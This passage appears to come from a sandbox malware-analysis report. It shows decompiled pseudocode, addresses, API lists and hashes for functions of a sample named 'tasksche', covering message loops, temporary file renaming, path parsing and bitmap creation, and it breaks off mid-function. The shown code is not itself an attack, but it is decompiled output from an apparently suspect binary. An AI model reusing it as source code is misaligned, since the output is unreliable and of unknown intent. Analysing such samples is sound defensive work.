                                                                                              					if( *((intOrPtr*)( *_t43 + 0x48))() >= 0 && _v8 != 0) {
                                                                                              						break;
                                                                                              					}
                                                                                              					if(GetTickCount() - _v16 > 0x7d0) {
                                                                                              						break;
                                                                                              					} else {
                                                                                              						if(PeekMessageW( &_v44, 0, 0, 0, 0) != 0) {
                                                                                              							GetMessageW( &_v44, 0, 0, 0);
                                                                                              							TranslateMessage( &_v44);
                                                                                              							DispatchMessageW( &_v44);
                                                                                              						}
                                                                                              						continue;
                                                                                              					}
                                                                                              				}
                                                                                              				_t47 = _a4;
                                                                                              				_t48 =  *((intOrPtr*)( *_t47 + 0x48))(_t47,  &_v8);
                                                                                              				__eflags = _t48;
                                                                                              				_a4 = _t48;
                                                                                              				if(_t48 < 0) {
                                                                                              					L15:
                                                                                              					__eflags =  *(_t90 + 8);
                                                                                              					if( *(_t90 + 8) != 0) {
                                                                                              						__eflags =  *(_t90 + 0x18);
                                                                                              						if( *(_t90 + 0x18) == 0) {
                                                                                              							_t51 =  *(_t90 + 0x14);
                                                                                              							__eflags = _t51;
                                                                                              							if(__eflags != 0) {
                                                                                              								_push(_t51);
                                                                                              								_t76 = E0041947D(_t75, _t90, __eflags);
                                                                                              								__eflags = _t76;
                                                                                              								if(__eflags != 0) {
                                                                                              									SetWindowPos( *(_t90 + 4), 1, 0, 0, 0, 0, 0x204);
                                                                                              									ShowWindow( *(_t90 + 8), 5);
                                                                                              									SetWindowTextW( *(_t90 + 8), _t76);
                                                                                              									_push(_t76);
                                                                                              									E0041A506(_t76, _t90, 0, __eflags);
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					L20:
                                                                                              					__eflags = _a4;
                                                                                              					_t41 = _a4 >= 0;
                                                                                              					__eflags = _t41;
                                                                                              					return 0 | _t41;
                                                                                              				}
                                                                                              				_t57 = _v8;
                                                                                              				__eflags = _t57;
                                                                                              				if(_t57 == 0) {
                                                                                              					L13:
                                                                                              					__eflags = _a4;
                                                                                              					if(_a4 < 0) {
                                                                                              						goto L15;
                                                                                              					}
                                                                                              					__eflags = _v8;
                                                                                              					if(_v8 != 0) {
                                                                                              						goto L20;
                                                                                              					}
                                                                                              					goto L15;
                                                                                              				}
                                                                                              				_t58 =  *((intOrPtr*)( *_t57))(_t57, 0x42b158,  &_v12);
                                                                                              				__eflags = _t58;
                                                                                              				_a4 = _t58;
                                                                                              				if(_t58 < 0) {
                                                                                              					L12:
                                                                                              					_t59 = _v8;
                                                                                              					 *((intOrPtr*)( *_t59 + 8))(_t59);
                                                                                              					goto L13;
                                                                                              				}
                                                                                              				_t61 = _v12;
                                                                                              				_t62 =  *((intOrPtr*)( *_t61 + 0x20))(_t61);
                                                                                              				__eflags = _t62;
                                                                                              				_a4 = _t62;
                                                                                              				if(_t62 >= 0) {
                                                                                              					_t65 = _v12;
                                                                                              					_a4 =  *((intOrPtr*)( *_t65 + 0x14))(_t65, _a8);
                                                                                              				}
                                                                                              				_t63 = _v12;
                                                                                              				 *((intOrPtr*)( *_t63 + 8))(_t63);
                                                                                              				goto L12;
                                                                                              			}

























                                                                                              0x00419642
                                                                                              0x0041964c
                                                                                              0x0041964e
                                                                                              0x00419651
                                                                                              0x00419656
                                                                                              0x00419659
                                                                                              0x00419659
                                                                                              0x00419661
                                                                                              0x00419662
                                                                                              0x00419668
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00419679
                                                                                              0x00000000
                                                                                              0x0041967b
                                                                                              0x0041968b
                                                                                              0x00419694
                                                                                              0x0041969e
                                                                                              0x004196a8
                                                                                              0x004196a8
                                                                                              0x00000000
                                                                                              0x0041968b
                                                                                              0x00419679
                                                                                              0x004196b0
                                                                                              0x004196ba
                                                                                              0x004196bd
                                                                                              0x004196bf
                                                                                              0x004196c2
                                                                                              0x0041971b
                                                                                              0x0041971b
                                                                                              0x0041971e
                                                                                              0x00419720
                                                                                              0x00419723
                                                                                              0x00419725
                                                                                              0x00419728
                                                                                              0x0041972a
                                                                                              0x0041972c
                                                                                              0x00419734
                                                                                              0x00419736
                                                                                              0x00419738
                                                                                              0x00419748
                                                                                              0x00419753
                                                                                              0x0041975d
                                                                                              0x00419763
                                                                                              0x00419764
                                                                                              0x00419769
                                                                                              0x00419738
                                                                                              0x0041972a
                                                                                              0x00419723
                                                                                              0x0041976a
                                                                                              0x0041976c
                                                                                              0x00419771
                                                                                              0x00419771
                                                                                              0x00419776
                                                                                              0x00419776
                                                                                              0x004196c4
                                                                                              0x004196c7
                                                                                              0x004196c9
                                                                                              0x00419711
                                                                                              0x00419711
                                                                                              0x00419714
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00419716
                                                                                              0x00419719
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00419719
                                                                                              0x004196d7
                                                                                              0x004196d9
                                                                                              0x004196db
                                                                                              0x004196de
                                                                                              0x00419708
                                                                                              0x00419708
                                                                                              0x0041970e
                                                                                              0x00000000
                                                                                              0x0041970e
                                                                                              0x004196e0
                                                                                              0x004196e6
                                                                                              0x004196e9
                                                                                              0x004196eb
                                                                                              0x004196ee
                                                                                              0x004196f0
                                                                                              0x004196fc
                                                                                              0x004196fc
                                                                                              0x004196ff
                                                                                              0x00419705
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00419654
                                                                                              • GetTickCount.KERNEL32 ref: 0041966F
                                                                                              • PeekMessageW.USER32 ref: 00419683
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00419694
                                                                                              • TranslateMessage.USER32(?), ref: 0041969E
                                                                                              • DispatchMessageW.USER32 ref: 004196A8
                                                                                              • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000204,?), ref: 00419748
                                                                                              • ShowWindow.USER32(?,00000005), ref: 00419753
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 0041975D
                                                                                                • Part of subcall function 0041A506: __lock.LIBCMT ref: 0041A524
                                                                                                • Part of subcall function 0041A506: ___sbh_find_block.LIBCMT ref: 0041A52F
                                                                                                • Part of subcall function 0041A506: ___sbh_free_block.LIBCMT ref: 0041A53E
                                                                                                • Part of subcall function 0041A506: RtlFreeHeap.NTDLL(00000000,00000000,0042D658,0000000C,0041EF84,00000000,0042D930,0000000C,0041EFBE,00000000,0041A9AB,?,00425448,00000004,0042DB18,0000000C), ref: 0041A56E
                                                                                                • Part of subcall function 0041A506: GetLastError.KERNEL32(?,00425448,00000004,0042DB18,0000000C,0042133E,00000000,0041A9BA,00000000,00000000,00000000,?,0041E966,00000001,00000214), ref: 0041A57F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Window$CountTick$DispatchErrorFreeHeapLastPeekShowTextTranslate___sbh_find_block___sbh_free_block__lock
                                                                                              • String ID:
                                                                                              • API String ID: 1762286965-0
                                                                                              • Opcode ID: bafafa4dd8c757d95478da334cf2287ee3efff84a52d295e05523efa741214d2
                                                                                              • Instruction ID: 0fcf3197ed2ac79a16e8f935243f891c0de6f754acb5965f6be033bd159a0870
                                                                                              • Opcode Fuzzy Hash: bafafa4dd8c757d95478da334cf2287ee3efff84a52d295e05523efa741214d2
                                                                                              • Instruction Fuzzy Hash: F4412871A00219EFCB10EFA5C8989DEBB79FF49751B10846AF905D7250D738DE81CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 92%
                                                                                              			E004084EE() {
                                                                                              				void* __ebx;
                                                                                              				void* _t38;
                                                                                              				short _t39;
                                                                                              				long _t41;
                                                                                              				void* _t46;
                                                                                              				short _t48;
                                                                                              				void* _t73;
                                                                                              				WCHAR* _t74;
                                                                                              				void* _t76;
                                                                                              				void* _t83;
                                                                                              				void* _t86;
                                                                                              				void* _t87;
                                                                                              				void* _t91;
                                                                                              				void* _t93;
                                                                                              
                                                                                              				E0041A4DC(E004296F3, _t91);
                                                                                              				E0041AAF0(0x5028);
                                                                                              				_t74 =  *(_t91 + 8);
                                                                                              				_t38 = _t91 - 0x5034;
                                                                                              				__imp__GetLongPathNameW(_t74, _t38, 0x800, _t83, _t87, _t73);
                                                                                              				if(_t38 == 0 || _t38 >= 0x800) {
                                                                                              					L19:
                                                                                              					_t39 = 0;
                                                                                              					__eflags = 0;
                                                                                              				} else {
                                                                                              					_t41 = GetShortPathNameW(_t74, _t91 - 0x4034, 0x800);
                                                                                              					if(_t41 == 0) {
                                                                                              						goto L19;
                                                                                              					} else {
                                                                                              						_t98 = _t41 - 0x800;
                                                                                              						if(_t41 >= 0x800) {
                                                                                              							goto L19;
                                                                                              						} else {
                                                                                              							 *((intOrPtr*)(_t91 - 0x10)) = E0040A5DB(_t98, _t91 - 0x5034);
                                                                                              							_t85 = E0040A5DB(_t98, _t91 - 0x4034);
                                                                                              							if( *_t45 == 0) {
                                                                                              								goto L19;
                                                                                              							} else {
                                                                                              								_t46 = E00411E60( *((intOrPtr*)(_t91 - 0x10)), _t85);
                                                                                              								_t100 = _t46;
                                                                                              								if(_t46 == 0) {
                                                                                              									goto L19;
                                                                                              								} else {
                                                                                              									_t48 = E00411E60(E0040A5DB(_t100, _t74), _t85);
                                                                                              									if(_t48 != 0) {
                                                                                              										goto L19;
                                                                                              									} else {
                                                                                              										 *(_t91 - 0x1010) = _t48;
                                                                                              										_t86 = 0;
                                                                                              										while(1) {
                                                                                              											_t103 =  *(_t91 - 0x1010);
                                                                                              											if( *(_t91 - 0x1010) != 0) {
                                                                                              												break;
                                                                                              											}
                                                                                              											E00410B9C(_t91 - 0x1010, _t74, 0x800);
                                                                                              											E0040BC16(E0040A5DB(_t103, _t91 - 0x1010), 0x800, L"rtmp%d", _t86);
                                                                                              											_t93 = _t93 + 0x10;
                                                                                              											if(E004092A5(_t91 - 0x1010) != 0) {
                                                                                              												 *(_t91 - 0x1010) = 0;
                                                                                              											}
                                                                                              											_t86 = _t86 + 0x7b;
                                                                                              											if(_t86 < 0x2710) {
                                                                                              												continue;
                                                                                              											} else {
                                                                                              												_t107 =  *(_t91 - 0x1010);
                                                                                              												if( *(_t91 - 0x1010) == 0) {
                                                                                              													goto L19;
                                                                                              												} else {
                                                                                              													break;
                                                                                              												}
                                                                                              											}
                                                                                              											goto L20;
                                                                                              										}
                                                                                              										E00410B9C(_t91 - 0x3034, _t74, 0x800);
                                                                                              										_push(0x800);
                                                                                              										E0040A745(_t107, _t91 - 0x3034,  *((intOrPtr*)(_t91 - 0x10)));
                                                                                              										if(MoveFileW(_t91 - 0x3034, _t91 - 0x1010) == 0) {
                                                                                              											goto L19;
                                                                                              										} else {
                                                                                              											E00408786(_t91 - 0x2034);
                                                                                              											 *(_t91 - 4) =  *(_t91 - 4) & 0x00000000;
                                                                                              											_t76 = 0;
                                                                                              											if(E004092A5( *(_t91 + 8)) == 0) {
                                                                                              												_t76 = E00408923(_t91 - 0x2034,  *(_t91 + 8), 0x12);
                                                                                              											}
                                                                                              											MoveFileW(_t91 - 0x1010, _t91 - 0x3034);
                                                                                              											if(_t76 != 0) {
                                                                                              												E00408A32(_t91 - 0x2034);
                                                                                              												E00408A80(_t91 - 0x2034);
                                                                                              											}
                                                                                              											 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
                                                                                              											E00408C7D(_t76, _t91 - 0x2034);
                                                                                              											_t39 = 1;
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				L20:
                                                                                              				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
                                                                                              				return _t39;
                                                                                              			}

















                                                                                              0x004084f3
                                                                                              0x004084fd
                                                                                              0x00408503
                                                                                              0x0040850e
                                                                                              0x00408516
                                                                                              0x0040851e
                                                                                              0x004086ab
                                                                                              0x004086ab
                                                                                              0x004086ab
                                                                                              0x0040852c
                                                                                              0x00408535
                                                                                              0x0040853d
                                                                                              0x00000000
                                                                                              0x00408543
                                                                                              0x00408543
                                                                                              0x00408545
                                                                                              0x00000000
                                                                                              0x0040854b
                                                                                              0x00408557
                                                                                              0x00408566
                                                                                              0x0040856c
                                                                                              0x00000000
                                                                                              0x00408572
                                                                                              0x00408576
                                                                                              0x0040857b
                                                                                              0x0040857d
                                                                                              0x00000000
                                                                                              0x00408583
                                                                                              0x0040858b
                                                                                              0x00408592
                                                                                              0x00000000
                                                                                              0x00408598
                                                                                              0x00408598
                                                                                              0x0040859f
                                                                                              0x004085a1
                                                                                              0x004085a1
                                                                                              0x004085a9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004085b4
                                                                                              0x004085cd
                                                                                              0x004085d2
                                                                                              0x004085e3
                                                                                              0x004085e7
                                                                                              0x004085e7
                                                                                              0x004085ee
                                                                                              0x004085f7
                                                                                              0x00000000
                                                                                              0x004085f9
                                                                                              0x004085f9
                                                                                              0x00408601
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00408601
                                                                                              0x00000000
                                                                                              0x004085f7
                                                                                              0x00408610
                                                                                              0x00408615
                                                                                              0x00408620
                                                                                              0x0040863d
                                                                                              0x00000000
                                                                                              0x0040863f
                                                                                              0x00408645
                                                                                              0x0040864d
                                                                                              0x00408651
                                                                                              0x0040865a
                                                                                              0x0040866c
                                                                                              0x0040866c
                                                                                              0x0040867c
                                                                                              0x00408680
                                                                                              0x00408688
                                                                                              0x00408693
                                                                                              0x00408693
                                                                                              0x00408698
                                                                                              0x004086a2
                                                                                              0x004086a7
                                                                                              0x004086a7
                                                                                              0x0040863d
                                                                                              0x00408592
                                                                                              0x0040857d
                                                                                              0x0040856c
                                                                                              0x00408545
                                                                                              0x0040853d
                                                                                              0x004086ad
                                                                                              0x004086b3
                                                                                              0x004086bb

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 004084F3
                                                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00408516
                                                                                              • GetShortPathNameW.KERNEL32 ref: 00408535
                                                                                                • Part of subcall function 0040A5DB: _wcslen.LIBCMT ref: 0040A5E1
                                                                                                • Part of subcall function 00411E60: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,00000000,000000FF,00409CA8,?,00000000,?,00409DC2,00000000,-00000002,?,00000000,?), ref: 00411E76
                                                                                              • _swprintf.LIBCMT ref: 004085CD
                                                                                                • Part of subcall function 0040BC16: __vswprintf_c_l.LIBCMT ref: 0040BC29
                                                                                              • MoveFileW.KERNEL32(?,00000000), ref: 00408639
                                                                                              • MoveFileW.KERNEL32(00000000,?), ref: 0040867C
                                                                                                • Part of subcall function 00410B9C: _wcsncpy.LIBCMT ref: 00410BB3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen_wcsncpy
                                                                                              • String ID: rtmp%d
                                                                                              • API String ID: 506780119-3303766350
                                                                                              • Opcode ID: a91559be58acffd0dc5b452dff065d579de74766ff3e95af3a762548e6537785
                                                                                              • Instruction ID: 086441498323e4bc326e09acd5d1366d0aff3811eaae5beb392a373780c828d6
                                                                                              • Opcode Fuzzy Hash: a91559be58acffd0dc5b452dff065d579de74766ff3e95af3a762548e6537785
                                                                                              • Instruction Fuzzy Hash: DE415E71901218AACB20EB61CE45EDF777CAF00394F0008ABB585B7181EA7D9B959E68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040AA7D(void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
                                                                                              				short _t10;
                                                                                              				void* _t13;
                                                                                              				signed int _t14;
                                                                                              				short* _t20;
                                                                                              				void* _t27;
                                                                                              				signed int _t29;
                                                                                              				signed short* _t30;
                                                                                              
                                                                                              				_t20 = _a8;
                                                                                              				_t30 = _a4;
                                                                                              				 *_t20 = 0;
                                                                                              				_t10 = E0040A0EA(_t30);
                                                                                              				if(_t10 == 0) {
                                                                                              					_t27 = 0x5c;
                                                                                              					if( *_t30 == _t27 && _t30[1] == _t27) {
                                                                                              						_t5 =  &(_t30[2]); // 0x4
                                                                                              						_t10 = E0041CA29(_t5, _t27);
                                                                                              						if(_t10 != 0) {
                                                                                              							_t13 = E0041CA29(_t10 + 2, _t27);
                                                                                              							if(_t13 == 0) {
                                                                                              								_t14 = E0041A7AF(_t30);
                                                                                              							} else {
                                                                                              								_t14 = (_t13 - _t30 >> 1) + 1;
                                                                                              							}
                                                                                              							_t29 = _t14;
                                                                                              							if(_t29 >= _a12) {
                                                                                              								_t29 = 0;
                                                                                              							}
                                                                                              							E0041C853(_t20, _t30, _t29);
                                                                                              							_t10 = 0;
                                                                                              							 *((short*)(_t20 + _t29 * 2)) = 0;
                                                                                              						}
                                                                                              					}
                                                                                              					return _t10;
                                                                                              				}
                                                                                              				return E0040BC16(_t20, _a12, L"%c:\\",  *_t30 & 0x0000ffff);
                                                                                              			}










                                                                                              0x0040aa7e
                                                                                              0x0040aa83
                                                                                              0x0040aa8a
                                                                                              0x0040aa8d
                                                                                              0x0040aa94
                                                                                              0x0040aab1
                                                                                              0x0040aab5
                                                                                              0x0040aabd
                                                                                              0x0040aac2
                                                                                              0x0040aacb
                                                                                              0x0040aad2
                                                                                              0x0040aadb
                                                                                              0x0040aae5
                                                                                              0x0040aadd
                                                                                              0x0040aae1
                                                                                              0x0040aae1
                                                                                              0x0040aaeb
                                                                                              0x0040aaf1
                                                                                              0x0040aaf3
                                                                                              0x0040aaf3
                                                                                              0x0040aaf8
                                                                                              0x0040ab00
                                                                                              0x0040ab02
                                                                                              0x0040ab02
                                                                                              0x0040aacb
                                                                                              0x00000000
                                                                                              0x0040ab06
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcschr$__vswprintf_c_l_swprintf_wcsncpy
                                                                                              • String ID: %c:\$%s.%d.tmp
                                                                                              • API String ID: 2474501127-1021493711
                                                                                              • Opcode ID: da4b65786035d2197ed7d49f53fcd311549ea47fe36f06ac93baee63d6beaa20
                                                                                              • Instruction ID: b4756b8e91951cb7d51e69898c9cc4431ccaeceaeab60524178106c8bdd82eb4
                                                                                              • Opcode Fuzzy Hash: da4b65786035d2197ed7d49f53fcd311549ea47fe36f06ac93baee63d6beaa20
                                                                                              • Instruction Fuzzy Hash: 8101042320431169DA20EB769C45C6B73ACDFD93A0B00883FF584E31C1EA78D4A0C27B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 87%
                                                                                              			E004192D0(intOrPtr __ecx) {
                                                                                              				long _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				char _v16;
                                                                                              				intOrPtr _v24;
                                                                                              				short _v32;
                                                                                              				struct tagMSG _v60;
                                                                                              				void* _t23;
                                                                                              				intOrPtr* _t25;
                                                                                              				short _t28;
                                                                                              				intOrPtr* _t30;
                                                                                              
                                                                                              				_v12 = __ecx;
                                                                                              				_v8 = GetTickCount();
                                                                                              				_t23 = GetTickCount() - _v8;
                                                                                              				while(_t23 <= 0x2710) {
                                                                                              					_t25 =  *((intOrPtr*)(_v12 + 0x10));
                                                                                              					 *((intOrPtr*)( *_t25 + 0xe0))(_t25,  &_v16);
                                                                                              					if(_v16 != 4) {
                                                                                              						if(PeekMessageW( &_v60, 0, 0, 0, 0) != 0) {
                                                                                              							TranslateMessage( &_v60);
                                                                                              							DispatchMessageW( &_v60);
                                                                                              							GetMessageW( &_v60, 0, 0, 0);
                                                                                              						}
                                                                                              						_t23 = GetTickCount() - _v8;
                                                                                              						continue;
                                                                                              					}
                                                                                              					break;
                                                                                              				}
                                                                                              				__imp__#8( &_v32);
                                                                                              				_t28 = 3;
                                                                                              				_v32 = _t28;
                                                                                              				_t30 =  *((intOrPtr*)(_v12 + 0x10));
                                                                                              				_v24 = 0x96;
                                                                                              				return  *((intOrPtr*)( *_t30 + 0xd8))(_t30, 0x3f, 2,  &_v32, 0);
                                                                                              			}













                                                                                              0x004192df
                                                                                              0x004192e4
                                                                                              0x004192e9
                                                                                              0x00419346
                                                                                              0x004192f8
                                                                                              0x00419302
                                                                                              0x0041930c
                                                                                              0x0041931e
                                                                                              0x00419324
                                                                                              0x0041932e
                                                                                              0x0041933b
                                                                                              0x0041933b
                                                                                              0x00419343
                                                                                              0x00000000
                                                                                              0x00419343
                                                                                              0x00000000
                                                                                              0x0041930c
                                                                                              0x0041934e
                                                                                              0x00419356
                                                                                              0x0041935c
                                                                                              0x00419363
                                                                                              0x0041936a
                                                                                              0x0041937e

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$CountTick$DispatchInitPeekTranslateVariant
                                                                                              • String ID:
                                                                                              • API String ID: 4242828014-0
                                                                                              • Opcode ID: 3739eaef324a12835188418d8e4db8062592f3b82a480bdb7c4c47042269d501
                                                                                              • Instruction ID: 9cb0af2a0f3e63d9aa0a53d062aebc77c377528e3d470f830326fa06e80cb38f
                                                                                              • Opcode Fuzzy Hash: 3739eaef324a12835188418d8e4db8062592f3b82a480bdb7c4c47042269d501
                                                                                              • Instruction Fuzzy Hash: C121F7B1E00208AFDB10DFE4D888EEEBBBCEF48305F504866F911E7250D6799E458B61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 69%
                                                                                              			E00419EA0(void* __edx, long long __fp0, void* _a4, signed int _a8, void* _a12) {
                                                                                              				void* _v8;
                                                                                              				void* _v12;
                                                                                              				void* _v16;
                                                                                              				void* _v20;
                                                                                              				void* _v24;
                                                                                              				signed int _v28;
                                                                                              				signed int _v32;
                                                                                              				struct HDC__* _v36;
                                                                                              				void* _v40;
                                                                                              				signed int _v56;
                                                                                              				signed int _v60;
                                                                                              				void _v64;
                                                                                              				struct HDC__* _v92;
                                                                                              				short _v94;
                                                                                              				short _v96;
                                                                                              				signed int _v100;
                                                                                              				signed int _v104;
                                                                                              				struct tagBITMAPINFO _v108;
                                                                                              				void* __edi;
                                                                                              				signed int _t76;
                                                                                              				char* _t77;
                                                                                              				void* _t78;
                                                                                              				intOrPtr* _t79;
                                                                                              				void* _t80;
                                                                                              				intOrPtr* _t81;
                                                                                              				intOrPtr* _t84;
                                                                                              				intOrPtr* _t86;
                                                                                              				short _t94;
                                                                                              				signed int _t97;
                                                                                              				intOrPtr* _t101;
                                                                                              				intOrPtr* _t103;
                                                                                              				intOrPtr* _t105;
                                                                                              				intOrPtr* _t107;
                                                                                              				intOrPtr* _t109;
                                                                                              				intOrPtr* _t111;
                                                                                              				intOrPtr* _t114;
                                                                                              				intOrPtr* _t117;
                                                                                              				signed int _t121;
                                                                                              				intOrPtr _t127;
                                                                                              				void* _t147;
                                                                                              				signed int _t151;
                                                                                              				long long* _t153;
                                                                                              				long long _t156;
                                                                                              
                                                                                              				_t156 = __fp0;
                                                                                              				if(E00419E75() != 0) {
                                                                                              					GetObjectW(_a4, 0x18,  &_v64);
                                                                                              					_t151 = _a8;
                                                                                              					asm("cdq");
                                                                                              					_t76 = _v56 * _t151 / _v60;
                                                                                              					_t121 = _a12;
                                                                                              					if(_t76 < _t121) {
                                                                                              						_t121 = _t76;
                                                                                              					}
                                                                                              					_t77 =  &_v8;
                                                                                              					__imp__CoCreateInstance(0x42b208, 0, 1, 0x42b100, _t77, _t147);
                                                                                              					if(_t77 < 0) {
                                                                                              						L17:
                                                                                              						_t78 = _a4;
                                                                                              						goto L18;
                                                                                              					} else {
                                                                                              						_t79 = _v8;
                                                                                              						_t80 =  *((intOrPtr*)( *_t79 + 0x54))(_t79, _a4, 0, 2,  &_v12);
                                                                                              						_t81 = _v8;
                                                                                              						if(_t80 < 0) {
                                                                                              							L10:
                                                                                              							 *((intOrPtr*)( *_t81 + 8))(_t81);
                                                                                              							goto L17;
                                                                                              						}
                                                                                              						_push( &_v16);
                                                                                              						_v16 = 0;
                                                                                              						_push(_t81);
                                                                                              						if( *((intOrPtr*)( *_t81 + 0x28))() < 0) {
                                                                                              							L9:
                                                                                              							_t84 = _v12;
                                                                                              							 *((intOrPtr*)( *_t84 + 8))(_t84);
                                                                                              							_t81 = _v8;
                                                                                              							goto L10;
                                                                                              						}
                                                                                              						_t86 = _v16;
                                                                                              						asm("fldz");
                                                                                              						_t127 =  *_t86;
                                                                                              						_push(0);
                                                                                              						_push(_t127);
                                                                                              						_push(_t127);
                                                                                              						 *_t153 = _t156;
                                                                                              						_push(0);
                                                                                              						_push(0);
                                                                                              						_push(0x42b218);
                                                                                              						_push(_v12);
                                                                                              						_push(_t86);
                                                                                              						if( *((intOrPtr*)(_t127 + 0x20))() >= 0) {
                                                                                              							E0041A820(0,  &_v108, 0, 0x2c);
                                                                                              							_v100 =  ~_t121;
                                                                                              							_v96 = 1;
                                                                                              							_t94 = 0x20;
                                                                                              							_v94 = _t94;
                                                                                              							_v108.bmiHeader = 0x28;
                                                                                              							_v104 = _t151;
                                                                                              							_v92 = 0;
                                                                                              							_v20 = 0;
                                                                                              							_t97 = CreateDIBSection(0,  &_v108, 0,  &_v24, 0, 0);
                                                                                              							_a12 = _t97;
                                                                                              							asm("sbb eax, eax");
                                                                                              							if(( ~_t97 & 0x7ff8fff2) + 0x8007000e >= 0) {
                                                                                              								_t107 = _v8;
                                                                                              								 *((intOrPtr*)( *_t107 + 0x2c))(_t107,  &_a8);
                                                                                              								_t109 = _a8;
                                                                                              								 *((intOrPtr*)( *_t109 + 0x20))(_t109, _v12, _t151, _t121, 3);
                                                                                              								_push(_v24);
                                                                                              								_t111 = _a8;
                                                                                              								_push(_t151 * _t121 << 2);
                                                                                              								_push(_t151 << 2);
                                                                                              								_push( &_v40);
                                                                                              								_v40 = 0;
                                                                                              								_v36 = 0;
                                                                                              								_v32 = _t151;
                                                                                              								_v28 = _t121;
                                                                                              								_push(_t111);
